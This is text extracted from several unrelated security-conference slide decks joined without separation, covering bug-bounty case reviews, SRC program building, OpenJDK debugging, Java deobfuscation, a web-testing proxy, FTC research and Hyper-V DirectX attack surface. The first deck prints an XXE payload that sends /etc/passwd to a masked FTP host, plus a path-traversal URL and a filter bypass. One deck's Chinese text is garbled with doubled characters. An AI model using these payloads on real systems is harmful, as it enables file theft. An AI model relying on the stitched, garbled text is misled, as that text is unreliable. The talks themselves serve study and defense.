https://github.com/BuffaloWill/oxml_xxe 修改[Content_Types].xml文件 Evil.xml文件内容,试着读取etc/passwd <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://*********:80/%file;'>"> %int;% send; 服务器监听ftp 图片上传存在ImageTragick命令执行(某SRC案例回顾-漏洞已修复) http://www.xxxxx.com/upload.php?w=140&h=105&s=1&url=http://42.62.**.**/test.png CVE-2016-3714 CVE-2018-16509 CVE-2019-6116 也有可能存在ghostscript远程命令执行漏洞 导致所有引用ghostscript的上游应用受影响,常见应用如下: imagemagick libmagick graphicsmagick gimp texmacs python-matplotlibtexlive-core latex2html latex2rtf等等 视频上传存在FFmpeg文件读取/ssrf(某SRC案例回顾-漏洞已修复) 如果某场景使用ffmpeg版本小于3.2.4,并且有上传用户自定义avi视频的时候,利用该漏洞可以读取服务器上任意文件。 制作特殊的avi上传 test.avi https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py 5 程 序 员 的 天 敌 是 产 品 经 理 和 安 全 人 员 当提交 ...//后,后台会过滤 ../ 替换成空,于是替换后...//变成了./ 厂商>>>漏洞已修复 复测发现修复不当可继续利用,继续提交漏洞 http://xx.xxxxx.com/tmpl?file=../../../../../../../../../etc/passwd 某SRC案例回顾-漏洞已修复 Other 阅尽天下漏洞,心中自然无码 不断学习,多关注新漏洞,学习新思路新姿势 关注新的cve/新的公开漏洞/各类ctf公开writeup …… 安全属于高危行业 白帽子首先需要学习一些法律知识,保护好自己 认清测试与入侵的区别 测试时点到为止,勿做破坏 未授权系统,请勿测试 不从事与任何黑产相关的活动 同时也希望企业可以想明白道理,知道自己正真的敌人是谁 End THANKS
聊聊这⼀一年年多以来 如何建设滴滴DSRC 分享嘉宾:安惞 今天,我打着滴滴来滴滴安全⼤大会,⼀一边听着《平凡之 路路》,⼀一边看着窗外的蓝天⽩白云,回忆起⼏几年年前在寒⻛风 中等⻋车,在地铁中赶路路,感觉真幸福。 滴滴改变出⾏行行 滴滴改变出⾏行行 现在,4.5亿⼈人的出⾏行行⽅方式,因为“滴滴⼀一下,⻢马上出发” 发⽣生了了改变。 ⽩白帽⼦子 漏漏洞洞 互联⽹网企业 情报、经验和传播共享 安全⼚厂商 产品、技术、⼈人才合作 ⾼高校 ⼈人才,漏漏洞洞,学术 媒体 传播,信息资源 政府 法律律法规 谁来保护滴滴4.5亿⽤用户的信息安全? 安全⽣生态圈 注:部分内容参考“⽼老老⻢马哥哥”默安科技公众号发布的⽂文章《浅谈企业安全技术品牌建设》 漏漏洞洞 ⼈人才 影响⼒力力 ⽩白帽⼦子 DSRC能做什什么? ⽩白帽⼦子 DSRC通过参照AARRR体系 建⽴立与⽩白帽⼦子关系维护的⽅方法 包括⽩白帽⼦子的拉新、促活、留留存、 转化和推荐 ⽩白帽⼦子推荐 ⽩白帽⼦子转化 ⽩白帽⼦子留留存 ⽩白帽⼦子促活 ⽩白帽⼦子拉新 提升⽩白帽⼦子 数量量质量量 提升漏漏洞洞 数量量质量量 ⽩白帽⼦子 ⽩白帽⼦子 Revenue Retention Activiation Acquisition Refer From AARRR ⽩白帽⼦子 ⽩白帽⼦子 ⽩白帽⼦子拉新 01 02 03 渠道 SEO/SEM 安全媒体、论坛: 社群:QQ群/微信群 新媒体:微博/微信公众号 业界安全⼤大会 推⼴广 线上推⼴广 ⾃自主:⾃自媒体运营,活动营销,⼈人⼯工邀请,SEO 合作:友商互推,项⽬目合作,媒体传播 线下推⼴广 ⾃自办⼤大会 友商⼤大会站台 成本 即愿意投⼊入到⽩白帽⼦子运营的 财物、⼈人⼒力力和时间成本 优质内容输出 趣味⽂文章 技术⽂文章 阶段促活活动 ⾃自营活动 合作活动 ⽩白帽激励体系 物质 精神 权益 ⽩白帽成⻓长体系 ⽩白帽积分体系 阶段性评价 ⽩白帽⼦子促活 ⽩白帽⼦子 ⽩白帽⼦子 ⽩白帽⼦子N⽉月留留存率= 该⾃自然⽉月后第N个⾃自然⽉月提交漏漏洞洞⽩白帽⼦子数/该⾃自然⽉月提交漏漏洞洞⽩白帽⼦子数 总体 数量量 1⽉月 2⽉月 3⽉月 4⽉月 1⽉月⽩白帽⼦子 x 100% 50% 25% 15% 2⽉月⽩白帽⼦子 y 100% 50% 25% 3⽉月⽩白帽⼦子 z 100% 50% ⽩白帽⼦子留留存 ⽩白帽⼦子促活 ⽩白帽⼦子拉新 ⽩白帽⼦子推荐 ⽩白帽⼦子转化漏漏洞洞 ⽣生命周期 ⽤用户属性 ⽤用户渠道 ⽩白帽⼦子召回 标准化服务 白帽子沟通 白帽子画像 争议协调 情感关怀 ⽤用户调研 原因分析 优化 定级处理理 奖励 ⽩白帽⼦子 ⽩白帽⼦子 ⽩白帽⼦子留留存 通过促活、留留存,提升⽤用户数量量质量量 通过分析、复盘,优化产品、策略略 1.漏漏洞洞转化 注册⽩白帽⼦子 ⽩白帽⼦子 ⽩白帽⼦子转化 ⽩白帽⼦子 3% 8% 20% 100% 提交漏漏洞洞⽩白帽⼦子 漏漏洞洞有效⽩白帽⼦子 ⾼高质量量⽩白帽⼦子 分析等量量、等质漏漏洞洞 SRC和⾮非SRC渠道的成本 包括:⼈人⼒力力,财⼒力力,时间 2.成本转化 ⽩白帽⼦子推荐 ⽩白帽⼦子 ⽩白帽⼦子 ⾃自媒体 核⼼心⽩白帽⼦子 安全团队 漏漏洞洞 像产品有⾃自⼰己的⽣生命周期,漏漏洞洞也 有⾃自⼰己的⽣生命周期 DSRC的漏漏洞洞⽣生命周期,⼜又是从何开 始,从何结束? DSRC漏漏洞洞闭环周期 对外: ⽩白帽⼦子运营: 拉新 促活 1 漏漏洞洞拉新 2 漏漏洞洞发现 对内: 内部漏漏洞洞提交 对外: DSRC平台 外部报告 对内: 应急响应 漏漏洞洞审核 对外: 争议协调 漏漏洞洞激励 规范化 3 漏漏洞洞响应 4 漏漏洞洞修复 对内: 漏漏洞洞管理理平台: 流程化,规范化,通知机制 知识库、资产、⼈人员 对外: 更更新状态 对内: 安全流程补查 安全产品漏漏报 安全报告通报 改进措施落地 对外: 额外激励 5 漏漏洞洞复盘改进 漏漏洞洞闭环 漏漏洞洞 ⾃自主 漏漏洞洞闭环 漏漏洞洞拉新 优势: 忠诚度⾼高,漏漏洞洞质量量⾼高 劣势: 资源较少,⾃自主打造影响⼒力力难度⼤大 优势: ⽩白帽⼦子基数⼤大,提升影响⼒力力 注意: 需保障安全 合作 VS 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞发现 http://sec.didichuxing.com/ DSRC平台 官方唯一对外 收集滴滴相关安全漏洞的平台 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞响应 迅速响应 ⽇日志排查 争议协调 漏漏洞洞响应SLA ⾼高危严重通报 利利⽤用与否 同类排查 原因分析 被忽略略 评级差异 漏漏洞洞已知 规范未覆盖 DSRC漏洞争议协调三原则: 1. 尊重白帽子的劳动成果和自尊心 2. 信任安全工程师的技术专业水平 3. 若争议是由于规范不明导致,以白帽子的利益作为该case的判定出发点,然后优化规范 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞修复 规范化 产品化 ⾃自动化 分类 定级 流程 SLA ⼯工作流 通知机制 漏漏洞洞去重 资产 ⼈人员 知识库 扫描器器 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞复盘改进 意识?需分?设计?开发? 测试?运维? 扫描器器 防护产品 逻辑、业务流程、 账号、⽀支付 SDL流程复盘 1 安全产品复盘 2 业务安全复盘 3 注意:改进措施责任到⼈人,明确到时间点,且持续跟进 ⼈人才 21世纪最值钱的是什什么? ⼈人才! ⼈人才从哪⾥里里来? DDCTF选拔优质信息安全⼈人才加盟 滴滴出⾏行行信息安全部 ⼈人才 ⼈人才 DDCTF 2017年年5⽉月, 滴滴出⾏行行信息安全部主办DDCTF ,⾯面向全国所有⾼高等院校全⽇日制在读学⽣生的信息安全技术 竞赛,旨在提升滴滴安全技术影响⼒力力,选拔校园端⾼高⽔水平⼈人才,锻造⾼高⽔水平信息安全团队,为滴滴⽤用户保 驾护航。 3685参赛 PV 80w+ 6⼈人⼊入职,包括冠军 影响⼒力力 ⽩白帽⼦子有专⻔门的运营体系 ⾼高校有DDCTF招聘⼈人才 那针对安全⽣生态圈的其他⻆角⾊色,如 何建⽴立品牌影响⼒力力? 影响⼒力力 影响⼒力力 专注最纯粹的安全技术 永远的好奇⼼心 数据安全 汽⻋车安全 安全攻防 macOS安全 蜜罐 调查取证 威胁情报 安全D头条 知识库 趣味⽂文章 ISC⼤大会 ISW⼤大会 XTCF联赛 i春秋互联⽹网安全责任峰会 …… 安全说 媒体传播 对外合作 专 注 最 纯 粹 的 安 全 技 术 感恩
openjdk8 编译与clion 调试 1 openjdk8 编译与clion 调试 Created Tags Mac catalina 10.15.7 , base java version = 1.8.91 step by step: brew install mercurial brew install autoconf brew install freetype brew install ccache xcode-select install or xcode-select —install gcc -v Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx- include- dir=/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/c++/4.2.1 Apple clang version 12.0.0 (clang-1200.0.32.29) Target: x86_64-apple-darwin19.6.0 Thread model: posix InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin ll /usr/bin/llvm-g++ lrwxr-xr-x 1 root wheel 7B 10 29 2019 /usr/bin/llvm-g++ -> clang++ ll /usr/bin/llvm-gcc lrwxr-xr-x 1 root wheel 5B 10 29 2019 /usr/bin/llvm-gcc -> clang @October 14, 2021 5:24 PM openjdk8 编译与clion 调试 2 clang++ -v Apple clang version 12.0.0 (clang-1200.0.32.29) Target: x86_64-apple-darwin19.6.0 Thread model: posix InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin clang -v Apple clang version 12.0.0 (clang-1200.0.32.29) Target: x86_64-apple-darwin19.6.0 Thread model: posix InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin download jdk8u least source code from codebase hg clone http://hg.openjdk.java.net/jdk8u/jdk8u jdk8u chmod 777 get_source.sh ./get_source.sh openjdk8 编译与clion 调试 3 chmod 777 configure ./configure --with-debug-level=slowdebug openjdk8 编译与clion 调试 4 sudo make LOG=trace all openjdk8 编译与clion 调试 5 if you laptop have 8 core 16 threads, may be 10mins. if you get some problem, congratulations, You fuck up. CMakeLists.txt cmake_minimum_required(VERSION 3.14) # 这个设置不需要严格对应,⾃⼰建个测试项⽬复制过来这段即可 openjdk8 编译与clion 调试 6 project(hotspot) file(GLOB_RECURSE SOURCE_FILES "*.cpp" "*.hpp" "*.c" "*.h") include_directories(hotspot/src/share/vm) include_directories(hotspot/src/cpu/x86/vm) include_directories(hotspot/src/share/vm/precompiled) include_directories(hotspot/src/share/vm/utilities) add_executable(hotspot ${SOURCE_FILES}) using LLDB create localhost in hosts. enjoy it. openjdk8 编译与clion 调试 7
Fingerprinting and Cracking Java Obfuscated Code Yiannis Pavlosoglou A total of 36 slides Brief Outline 1. Background 2. Motivation 3. Methodology 4. Fingerprinting Tool 5. Examples 6. Conclusions 1. Background • Java Bytecode Operations • Language Security Mechanisms • Disassembling HelloWorld.java • From Bytecode to Source • What Popular Obfuscators Offer? 1.1 Java Bytecode Architecture (x86, PPC, Alpha) Java Virtual Machine Class Loader Execution Engine MyProject.jar MyProject.class Host Operating System (Windows, Linux, etc.) Native Method Calls Bytecode 1.2 Language Security Mechanisms • Type, memory and control flow checks – Instruction sets of the virtual machine [1] • Object creation – Privilege escalation [2] • Function calls • Exception handling – Verification (format, type, other violations) [3] • Security vulnerabilities lsd-pl.net [4] 1.3 HelloWorld in Bytecode HelloWorld.java HelloWorld.class HelloWorld.bc (javac) (javap) 1.4 Bytecode to Source • Java is Platform Independent Code – Simplifies reversing compared to C/C++ • Popular Java Decompilers [5] • Particular obfuscators are written with the operations of java Decompilers in mind [6] 1.5 What do obfuscators offer? • Operations: – Less Human Readable Code – Remove Debug Information – Alter the Control Flow – “Encrypt” Constants – Restructure Simple Logic – Inject Unnecessary Code • Usability: – Used for applications that are delivered to the user – Generally, used in J2SE Applets, Installed Applications, etc. – Generally, not used in Java Enterprise Environments 2. Motivation • Basic Obfuscation Techniques • Reverse Engineering Particulars • Who is Using Obfuscators? 2.1 Basic Obfuscation Techniques • Renaming of objects and methods – a.class, b.class, a.c(5), etc. • Extending classes – public class a extends d { • Removing line numbers • Encoding String Values • Variable Splitting Techniques – boolean z becomes int x=1; if (x < 0) “Obfuscation is possible for the same reasons that decompiling is possible” [7] 2.2 Reverse Engineering Particulars • Obtain Application Code • Extract/Review Class Files • Quickly Establish: – Renamed files – Missing debug info – Unnecessary code present – Potential code optimization 2.3 Who is Using Obfuscators? • Let us have a quick browse… 3. Methodology • A Taxonomy of obfuscating transforms • String and constant representation • Uniformity across the code base • Kirchoff’s principle reversed • Obfuscation encryption levels Data Obfuscation Split Variables Promote Scalars to Objects Inheritance Relations Change Encoding Split, Fold, Merge Arrays Reorder Instance Variables Layout Obfuscation Scramble Identifiers Change formatting Remove Comments, Line Numbers Remove Debug Information Control Obfuscation Clone Methods Reorder Statements and Loops Reducible to Non-reducible Flow Graphs Extend Loop conditions Outline Statements Preventive Obfuscation Exploit Weaknesses in Current Decompilers and Deobfuscators Explore inherent problems with known deobfuscation techniques 3.1 Taxonomy of Obfuscating Transforms Source: [8] 3.2 String and Constant Representation • The Perfect Entry Point! • Identifying Strings while Reversing: – Yields Architecture – Yields Design Patterns – Hard-coded Constants 3.3 Uniformity Across the Code Base • Typically, obfuscation is uniform across the code base • Understanding how UI and IO operations are obfuscated is key to cracking • Design patterns and used structures (e.g. Vectors, Lists, FILOs) are also key • Generally, obfuscators do not offer more than a handful of options for a transform 3.4 Kirchoff’s Principle Reversed • Obfuscation aims to make the code harder to interpret • The equivalent of a known plaintext attack in a cryptosystem • Becomes a known code attack for an obfuscator • Using the obfuscator as a black box, assess the level of leet it offers 3.5 Obfuscation Encryption Levels • Non-existent – Difficult to implement – Of little benefit: The bytecode has to run! • No public/private crypto offered – Can it be implemented? • String encryption uses XOR type operations – CPU and memory usage factors 4. Fingerprinting Tool • Calibration Check • Developing elucidate • List of Available Flags • Target Deliverables of elucidate 4.1 Calibration Check • Depending on the obfuscation transform we intend to identify • Attempt to generate generic definitions within a test class • Objective: Capture the obfuscator’s fingerprint 4.2 Developing elucidate • Build Calibration Classes for Particular Obfuscation Transforms • Obtain Fingerprints for Particular Obfuscators • Check the Generality and Overlap with other Obfuscators of that Fingerprint • Include Results in elucidate 4.3 List of available flags • >perl elucidate.pl -h • Elucidate v0.1 - Java Obfuscator Fingerprinting/Cracking Tool • Usage: elucidate.pl [-options *] • -h : Print this usage message • -v : Verbose option • -o : Print supported obfuscators • -t : Test current java environment • -f file : Specify class file to identify • -j jar file : Specify jar file to identify • -d directory : Specify directory to identify • Examples: • elucidate.pl -f MyClass.class • elucidate.pl -d MyJar.jar 4.4 Target Deliverables of elucidate • Given a jar file, or class files • Identify which obfuscator has been used • Recover known Strings within the file • Give an estimate of the complexity • Provide a map, as a tool of the application 5. Examples • Examine the following commercial tools: – Zelix KlassMaster (4.5.0) – JShrink (2.3.7) – RetroGuard (2.2.0) 5.1 Zelix KlassMaster 4.5.0 (1/4) • String literals three levels: Normal, Aggressive and Flow Obfuscate. • PasswordCheck.class through javap: 6 : ldc #8; //String ,bw:)q`iqv,=\" 14 : ldc #6; //String (km:N}?ps&, 22 : ldc #3; //String ,oa(-↓#w<.♀o}i?... 30 : ldc #9; //String ,bw:)‼q`i←♫qk; 5.1 Zelix KlassMaster 4.5.0 (2/4) • Output in Unicode format • Special characters such as \n \b … • Unicode octal (\777) • Unicode hexadecimal (\FFFF) 5.1 Zelix KlassMaster 4.5.0 (3/4) • Uses XOR operation with five keys: • 124, 3, 4, 73, 94 • -Original: ,bw:)‼q`i↔‼qv," • ->Decoded: Password Correct! • 64: tableswitch{ //0 to 3 • 0: 96; • 1: 101; • 2: 105; • 3: 109; • default: 114 } • 96:bipush 124 • 98:goto 116 • 101: iconst_3 • 102: goto 116 • 105: iconst_4 • 106: goto 116 • 109: bipush 73 • 111: goto 116 • 114: bipush 94 • 116: ixor • 117: i2c 5.1 Zelix KlassMaster 4.5.0 (4/4) • String literals: Normal, Aggressive and Flow Obfuscate. • The algorithm used for all three appears to be identical. • Yet, the keys used, change at every obfuscation attempt. 5.2 JShrink 2.3.7 (1/4) • Creates a new package, with a single class • Replaces String code with: 23: bipush 62 25: invokestatic #48; //Method I/I.I:(I)Ljava/lang/String; 28: invokevirtual #7; //Method java/lang/String.equals:(Ljava/lang/Objec t;)Z • Equivalent to: ( I.I.I( 79 ) ); 5.2 JShrink 2.3.7 (2/4) • Contents of package I include a file called I.gif • However, this file is not an image file: • As a file is being accessed, a decompiler can be used to view I.class 5.2 JShrink 2.3.7 (3/4) 1. public class I { 2. … 3. public static synchronized final String I(int int1){ 4. int int2 = int1 & 0xFF; 5. if( close[int2] != int1 ) { 6. String String3; 7. close[int2] = int1; 8. if( int1 < 0 ) { 9. int1 = int1 & 0xFFFF; 10. String3 = new String( SDQU, int1, SDQU[int1 - 0x1] & 0xFF ).intern(); 11. append[int2] = String3; 12. } 13. return append[int2]; 14. } 15. … 16. static { 17. try { 18. Object Object1 = new I().getClass().getResourceAsStream( "" + 'I' + '.' + 'g' + 'i' + 'f' ); 5.2 JShrink 2.3.7 (4/4) • Creates an invalid gif file storing the encrypted Strings • Uses a separate class and method to perform decryption • Replaces Strings with: I.I(int) e.g. I.I(97) • Does not alter Strings declared as static and final • Introduces exceptions if the wrong int is passed as argument 5.3 RetroGuard 2.2.0 • Does offer String encryption • Goes to show that some obfuscators simply don’t use this approach • The creators of RetroGuard quote: “obfuscation is not encryption” 6. Final Conclusions • Static obfuscation is at a primitive level • Encrypted Strings are an excellent entry point into understanding the application • Identifying the crypto used: – yields the obfuscator tool used – yields what changes to expect in snippets 6. Final Conclusions • Propose polymorphic obfuscation – Developers map out critical elements • Understanding of what an obfuscator can do – Obfuscator changes behaviour depending on file • UI treated differently to say, protocol implementation – Algorithms vary according to key file • In how many ways can you write a for/while loop? Questions • subere@uncon.org
 Martin Holst Swende  @mhswende  Patrik Karlsson  @nevdull77  Is very diverse: from a low-level infrastructure point-of-view to high-level application flow  There are many tools, but a central component is an intercepting proxy  Usually complex beasts Feature Requirement Must be in proxy? Possible alternatives Sitemapping Traffic data No Http-level: trivial. Based on html inspection : e.g. in browser DOM– javascript. Content analysis Traffic data No W3af, ratproxy, proxmon, webscarab, burp etc Fuzzing Traffic data No JBroFuzz Spidering Traffic data No Browser-based spiders with DOM- access. Many choices. Interception Live traffic Yes None Manual request Traffic data + sockets No An http/html/json/xml editor + sockets Manual inspect Traffic data No An http/html/json/xml editor Sess. id analysis Traffic data No Stompy Search Traffic data No Wide range: grep to lucene  It hogs my machine  Oh noes: OS updates itself through the proxy  They usually don’t perform well after a few thousand requests  It is not flexible  Ok, I see the GET-params in the overview. ▪ …but now I want to see the POST – params ▪ … and now I want to see which of my browsers sent it ▪ … and now I want to see all Server-headers. Ordered by path. ▪ … and now I only want to see responses with content type application/json and the value of the json parameter ”foobar”.  And what’s with all these cookies eating my screen real estate?  It is not open  I wonder if <tool> would’ve detected that internal ip address?  ”Let’s chain it: Webscarab, Burp, Paros and Ratproxy” ▪ The road to madness…  Write an intercepting proxy  Lightweight ▪ Memory-consumption does not grow with traffic ▪ Streams all non-captured traffic to destination asap  Recording ▪ Saves to database - MongoDB ▪ Document store where parsed data is stored as JSON documents ▪ Platform independent, Open Source and fast  Write an analysis engine  Flexible ▪ Using MongoDB advanced querying facilities ▪ Using dynamic views for data  And open ▪ With several different ways to analyse, export and utilise existing applications.  Based on Owasp Proxy (by Rogan Dawes)  Records traffic to DB, both in parsed object form and the raw binary data.  TCP interception (still in alpha)  Syntax highlightning  FQ/NFQ intercept mode (think freedom as in telnet)  Proxy chaining  Reverse proxy mode  …This is definitely not your all-in-one proxy!  What is it?  What does it do?  Why use it?  How do I get it?  What does it run on, prerequisites?  What is it?  A MongoDB browser, with additional functionality to extract and display information geared towards web application testing.  A platform for utilising existing tools on pre- recorded data.  What does it do?  Displays traffic data as defined by the user  Traffic and pattern aggregation  Traffic analysis via w3af and ratproxy  Export recorded traffic to other proxies  Filter and sort data  And more...  It is simple to write the kind of view you need for the particular purpose at hand.  Example scenarios:  Analysing user interaction using several accounts with different browsers, you are interested in cookies, user-agent  Analysing server infrastructure ▪ Server headers,Banner-values, File extensions,Cookie names  Searching for potential XSS ▪ Use filters to see only the requests where content is reflected  Analyzing brute-force attempt ▪ Request parameter username, password, Response delay, body size, status code and body hash The v0 parameter is the object id. This column uses 'Coloring', which means that the value is not displayed, instead a color is calculated from the hash of the value.  Aggregation (grouping) is a feature of MongoDB.  It is like a specialized Map/Reduce  You provide the framework with a couple of directives and the database will return the results, which are different kinds of sums.  Pass JS right into the DB  Example scenarios:  Generate sitemap  Show all http response codes, sorted by host/path  Show all unique http header keys, sorted by extension  Show all request parameter names, grouped by host  Show all unique request parameter values, in grouped by host  Datafiddler has a mechanism to run selected traffic through third-party plugins. Currently implemented*:  Ratproxy plugin. Starts ratproxy process, feeds traffic through it, and collects output.  Generic proxy plugin. Feeds data to a proxy (e.g Burp) which in turn uses a Datafiddler as forward proxy.  Webscarab export. Writes traffic data to webscarab save-format. Useful e.g. to do manual requests edit or use fuzzer.  * Defcon19-release  Why use it?  To better be able to make sense of large bodies of complex information  To maintain control of your data by not tying it to one single application  How do I get it?  Download the source ▪ https://bitbucket.org/holiman/hatkit-proxy/ ▪ https://bitbucket.org/holiman/hatkit-datafiddler/  Or the released binaries ▪ https://bitbucket.org/holiman/hatkit-proxy/downloads ▪ https://bitbucket.org/holiman/hatkit-datafiddler/downloads  And check out the documentation ▪ https://www.owasp.org/index.php/OWASP_Hatkit_Proxy_Pr oject ▪ https://www.owasp.org/index.php/OWASP_Hatkit_Datafiddl er_Project  What does it run on, prerequisites?  Python  Qt4  PyQt4 bindings  Python MongoDB driver  MongoDB  (optional: w3af)  (optional: ratproxy) Tested on Linux and MacOSX  Upcoming features  Cache proxy ▪ Datafiddler can act as forwarding proxy and use collected traffic as cache. On cache miss, it can either contact remote host or issue 403. This enables: ▪ Resume aborted Nikto-scan ▪ Gather e.g. screenshots post mortem without access to target  Fuzzer integration ▪ Send requests directly to a fuzzer.  New release at Defcon19! For web application testers, the Hatkit combo is very useful for analyzing remote servers and applications, from a low-level infrastructure point-of-view to high-level application flow. For server administrators, The Hatkit Proxy can be set as a reverse proxy, logging all incoming traffic. The combo can then be used as a tool to analyze user interaction, e.g. to detect malicious activity and perform post mortem analysis. The back-end can scale to handle massive amounts of data.  To learn more or join the project, join the mailing lists  Owasp-hatkit-datafiddler- project@lists.owasp.org  Owasp-hatkit-proxy-project@lists.owasp.org  Questions?
RESEARCH ON THE MACHINES HELP THE FTC PROTECT PRIVACY AND SECURITY Humans User: Terrell McSweeny Function: Commissioner, FTC User: Lorrie Cranor Function: Chief Technologist, FTC Machines Speech Schematics Privacy & Security Protections Now Issues of the Day We Need Your Help! How does the FTC respond to the Rise of the Machines? When machines are everywhere? What does the FTC do? Unfair Deceptive What do “unfair” and “deceptive” mean? • Unfair = – Substantial Injury to Consumers – Unavoidable – Not Outweighed Procompetitive By Benefits • Deceptive = – Act Likely to Mislead Consumers – Unreasonable – Material For Example … Facebook promised to keep personal info safe, but allowed 3rd party access Snapchat promised images would disappear, but kept them Wyndham unfairly exposed consumers’ payment-card info in three separate data breaches For Example … Google promised Gmail contacts wouldn’t be used elsewhere, but used them in its social-media site, Buzz ASUS promised its routers would protect local network against attacks, but failed to update them enough ORACLE promised its updates would protect consumers, but didn’t protect older versions of Java SE. PII FCC NHTSA DOE FAA HIPPA Defenseless Data FACTA ECOA COPPA FCRA FTC Act FTC Current Issues Office of Technology Research & Investigation 2016 Fall Technology Series Ransomware September 7 Drones October 13 Smart TV December 7 ftc.gov/tech Putting Disclosures to the Test September 15, 2016 ftc.gov/tech ftc.gov/tech January 12, 2017 Research Wish List: What is the FTC looking for? We want… … Research On Privacy and Security • What value do consumers put on various aspects of privacy in different contexts? • How can we assess the risk of harm from security and privacy breaches? • How can we trace the illegal sale of identity info back to a particular breach? • How can interventions make attacks less economically viable? • What does the FTC need to know to protect consumers from ransomware, malvertising, etc? … Research to Enhance Fraud Detection • How are fraud and attacker ecosystems organized? Participants? Tools? Incentives? • How can we detect fraudulent ads and online posts? • What practices, communications, methods are signs of fraudulent activity? … New Tools for Privacy and Security • Allow users to control personal info • Filter or block unwanted marketing calls and scams on all types of phone lines • Prevent or detect callerID spoofing …New Tools for Investigation & Enforcement • Analyze apps to determine practices associated with third-party libraries • Detect discriminatory algorithms • Identify when tracking is occurring and what info is being collected • Identify cross-device tracking • Identify vulnerable IoT devices • Analyze law enforcement complaint databases, social network data, etc. to detect emerging scams ….Research On Emerging Technologies & Trends • Connected Devices and Cloud Services – What do consumers understand about “buying” cloud services? – What do consumers understand about security issues when devices are no longer supported and updated? – Do firms have adequate plans to inform consumers about the lifecycle of connected products? • Virtual Reality – What are security and privacy impacts of VR? – Does VR raise new consumer protection concerns? • Intelligent machines – ???????? What happens to the findings you submit? Send us your papers Tell us what you’ve discovered Come to our workshops ftc.gov/tech We Want You! Federal Trade Commission (Version 2016.8) C:\DefCon\hackerInput.exe >… #Any questions? #Learn more at ftc.gov/tech
#BHUSA @BlackHatEvents DirectX: The New Hyper-V Attack Surface Zhenhao Hong (@rthhh17) Ziming Zhang (@ezrak1e) #BHUSA @BlackHatEvents Information Classification: General whoami Zhenhao Hong (@rthhh17) • Security Specialist of Ant Group Light-Year Security Lab • 2019-2020 MSRC Most Valuable Security Researchers • Black Hat USA 2021 Speaker Ziming Zhang (@ezrak1e) • Security researcher of Ant Group Light-Year Security Lab • 2021 Tianfu Cup Windows project winner • 2021 Q2/Q4 Microsoft Most Valuable Security Researchers #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General Intro ➢ In 2020, Hyper-V introduced a new feature of GPU- Paravirtualization. ➢ This technology is integrated into WDDM (Windows Display Driver Model) and all WDDMv2.5 or later drivers have native support for GPU virtualization. ➢ New features mean new attack surfaces. #BHUSA @BlackHatEvents Information Classification: General WDDM Architecture https://docs.microsoft.com/en-us/windows-hardware/drivers/display/images/dx10arch.png #BHUSA @BlackHatEvents Information Classification: General Hyper-V DirectX Component Architecture Hypervisor (Ring -1) User Mode Kernel Mode Linux VM Windows Host VMBUS (hv_vmbus.ko) DirectX LKM (dxgkrnl.ko) Application /dev/dxg vmcall Application Runtime Component UserMode Driver VMBUS Component DirectX graphics kernel subsystem (dxgkrnl.sys) DirectX graphics MMS (dxgmms1.sys & dxgmms2.sys) GPU driver vmcall #BHUSA @BlackHatEvents Information Classification: General WDDM Data Flow Hypervisor (Ring -1) User Mode Kernel Mode Linux VM Windows Host VMBUS (hv_vmbus.ko) DirectX LKM (dxgkrnl.ko) Application /dev/dxg vmcall Application Runtime Component UserMode Driver VMBUS Component DirectX graphics kernel subsystem (dxgkrnl.sys) DirectX graphics MMS (dxgmms1.sys & dxgmms2.sys) GPU driver vmcall 1 2 3 4 5 #BHUSA @BlackHatEvents Information Classification: General Hyper-V DirectX Component Data Flow Hypervisor (Ring -1) User Mode Kernel Mode Linux VM Windows Host VMBUS (hv_vmbus.ko) DirectX LKM (dxgkrnl.ko) Application /dev/dxg vmcall Application Runtime Component UserMode Driver VMBUS Component DirectX graphics kernel subsystem (dxgkrnl.sys) DirectX graphics MMS (dxgmms1.sys & dxgmms2.sys) GPU driver vmcall 1 2 3 4 5 6 7 #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General How to config ➢ Add a Virtual GPU to the virtual machine (ubuntu). #BHUSA @BlackHatEvents Information Classification: General In Virtual Machine (Linux VM) GPU paravirtualization per virtual GPU DXGK channel GPU paravirtualization global DXGK channel #BHUSA @BlackHatEvents Information Classification: General DirectX Virtual Device ---- Linux(VM) Driver Support ➢ Only supported in WSL2-Linux-Kernel source code tree. (https://github.com/microsoft/WSL2-Linux-Kernel/tree/linux-msft-wsl- 5.10.y/drivers/hv/dxgkrnl) - Easy to compile - Easy to customization ➢ Linux driver(dxgkrnl.ko) exposes the " /dev/dxg " device to user mode Linux. - Exposes a set of IOCTLs. #BHUSA @BlackHatEvents Information Classification: General Agenda ①Hyper-V DirectX Component Architecture ②How to Config ③Attack Surface ④Vulnerabilities details ⑤Fuzz is necessary ⑥Conclusion and Black Hat Sound Bytes #BHUSA @BlackHatEvents Information Classification: General DirectX Component initialize in Linux VM dxgvmbuschannel_init dxgglobal_init_global_channel dxgadapter_set_vmbus GPU paravirtualization global DXGK channel initialize GPU paravirtualization per virtual GPU DXGK channel initialize #BHUSA @BlackHatEvents Information Classification: General Data Send&Recv in Linux VM ➢ Send - dxgvmb_send_sync_msg - dxgvmb_send_async_msg ➢ Receive - dxgvmbuschannel_receive Send dxgkrnl commands to Host. Such as: DXGK_VMBCOMMAND_xxxxx Receive 